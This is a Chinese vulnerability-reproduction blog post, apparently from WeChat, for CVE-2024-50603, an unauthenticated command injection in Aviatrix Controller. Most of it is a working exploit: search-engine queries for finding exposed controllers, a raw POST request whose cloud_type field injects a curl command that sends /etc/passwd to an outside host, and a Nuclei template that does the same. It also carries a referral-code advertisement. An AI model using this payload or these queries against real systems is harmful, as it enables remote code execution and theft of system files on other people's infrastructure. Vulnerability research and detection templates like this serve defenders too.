影响范围 | Aviatrix Controller < 7.1.4191
Aviatrix Controller 7.2.x < 7.2.4996 |
|
漏洞评分 | 10.0 | |
利用条件 | 用户认证 | 无 |
利用难度 | 低 | |
|
|
|
解决方案 | 升级版本 |
fofa: app="aVIaTrIX-Controller"
Quake:app:"Aviatrix Controller"
# 风里雨里,我都在quake等你。个人中心输入邀请码“lnBNF0”你我均可获得5,000长效积分哦,地址 quake.360.net
POST/v1/api HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0Safari/537.36
Connection: close
Content-Length: 193
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+http://dnglog)
id: CVE-2024-50603
info:
name: Aviatrix Controller RCE
author: newlinesec,securing.pl
severity: critical
description: |
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
reference:
- https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2024-50603
- https://docs.aviatrix.com/documentation/latest/network-security/index.html
- https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2024-50603
cwe-id: CWE-78
metadata:
vendor: aviatrix
product: controller
zoomeye-query: app="Aviatrix Controller"
tags: cve,cve2024,aviatrix,controller,rce,oast
variables:
oast: "{{interactsh-url}}"
http:
- raw:
- |
POST /v1/api HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: status
status:
- 200
- type: regex
part: interactsh_request
regex:
- 'root:.*:0:0:'
<<< END >>>
更多漏洞|关注作者查看
作者|混子Hacker
原文始发于微信公众号(混子Hacker):【漏洞复现】CVE-2024-50603
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论